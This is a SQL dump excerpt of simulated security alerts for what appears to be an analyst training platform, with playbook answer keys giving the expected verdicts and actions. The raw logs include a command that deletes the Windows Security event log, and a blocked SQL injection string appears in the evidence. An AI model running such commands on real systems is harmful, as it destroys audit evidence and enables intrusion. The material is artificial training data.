203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(331, 'Attempt to Cover Tracks Detected', 'high', 'Log Monitoring System', 'An advanced attack has been detected where log files are being tampered with, indicating an attempt to erase evidence of an attack.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', 189, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"4625\",\"system\":{\"hostname\":\"server01.internal.local\",\"ip_address\":\"192.168.1.15\"},\"user\":{\"username\":\"attacker_user\",\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\"},\"action\":\"Delete\",\"target_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process\":{\"name\":\"cmd.exe\",\"id\":\"5604\",\"command_line\":\"cmd.exe /c del C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\"},\"network\":{\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"protocol\":\"TCP\",\"port\":\"445\"},\"hash\":{\"algorithm\":\"SHA256\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"}}', '2026-01-02 20:29:44', '2026-03-09 03:10:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple attack campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this hash.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:18.925Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:35:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"system\\\":{\\\"hostname\\\":\\\"server01.internal.local\\\",\\\"ip_address\\\":\\\"192.168.1.15\\\"},\\\"user\\\":{\\\"username\\\":\\\"attacker_user\\\",\\\"user_id\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\"},\\\"action\\\":\\\"Delete\\\",\\\"target_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process\\\":{\\\"name\\\":\\\"cmd.exe\\\",\\\"id\\\":\\\"5604\\\",\\\"command_line\\\":\\\"cmd.exe /c del C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":\\\"445\\\"},\\\"hash\\\":{\\\"algorithm\\\":\\\"SHA256\\\",\\\"value\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(332, 'Internal Reconnaissance Detected', 'high', 'SIEM Alerts', 'The attacker performs scans and probes to map out the network and identify further targets. Advanced techniques were used to evade detection during reconnaissance activities.', 'Reconnaissance', 'T1046: Network Service Scanning', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"rec-2023-00123\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.105\",\"scanned_ports\":[22,80,443,445],\"protocol\":\"TCP\",\"detected_tool\":\"nmap\",\"username\":\"admin\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"action\":\"network_scan\",\"outcome\":\"success\"}', '2026-01-02 20:29:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP associated with known scanning activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by scan.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with reconnaissance tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.926Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"rec-2023-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"scanned_ports\\\":[22,80,443,445],\\\"protocol\\\":\\\"TCP\\\",\\\"detected_tool\\\":\\\"nmap\\\",\\\"username\\\":\\\"admin\\\",\\\"hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"action\\\":\\\"network_scan\\\",\\\"outcome\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(333, 'Final Data Extraction Detected', 'critical', 'Data Exfiltration Monitoring', 'Large volumes of data are prepared for final exfiltration, marking the conclusion of the attack operation. Data transfer detected from internal network to an external IP linked with known malicious activity.', 'Exfiltration', 'T1020', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-03T14:45:00Z\",\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"203.0.113.99\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3b5d5c3712955042212316173ccf37be\",\"protocol\":\"HTTPS\",\"action\":\"Data Transfer\",\"bytes_transferred\":104857600,\"indicator_of_compromise\":true}', '2026-01-02 20:29:44', '2026-02-18 15:16:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b5d5c3712955042212316173ccf37be\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"File hash found in recent suspicious activity reports.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Filename matches naming pattern of sensitive data archives.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity\",\"verdict\":\"suspicious\",\"details\":\"User account has been flagged for unusual activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:18.927Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-03T14:45:00Z\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"203.0.113.99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"3b5d5c3712955042212316173ccf37be\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"Data Transfer\\\",\\\"bytes_transferred\\\":104857600,\\\"indicator_of_compromise\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(334, 'Compromised Website Detected', 'high', 'Web Proxy Logs', 'APT32 has injected malicious JavaScript into the human rights organization\'s website, setting the stage for the delivery of a malicious payload to site visitors.', 'Initial Access', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:52Z\",\"client_ip\":\"192.168.1.105\",\"request_method\":\"GET\",\"host\":\"humanrights.org\",\"url\":\"/index.html\",\"referrer\":\"http://malicious-redirect.com/landing\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\",\"status_code\":200,\"response_size\":4521,\"malicious_js_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\"}', '2026-01-02 20:31:37', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT32 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious JavaScript used by APT32\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-redirect.com/landing\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing campaigns and malware distribution\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\\",\\\"status_code\\\":200,\\\"response_size\\\":4521,\\\"malicious_js_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.928Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:52Z\\\",\\\"client_ip\\\":\\\"192.168.1.105\\\",\\\"request_method\\\":\\\"GET\\\",\\\"host\\\":\\\"humanrights.org\\\",\\\"url\\\":\\\"/index.html\\\",\\\"referrer\\\":\\\"http://malicious-redirect.com/landing\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 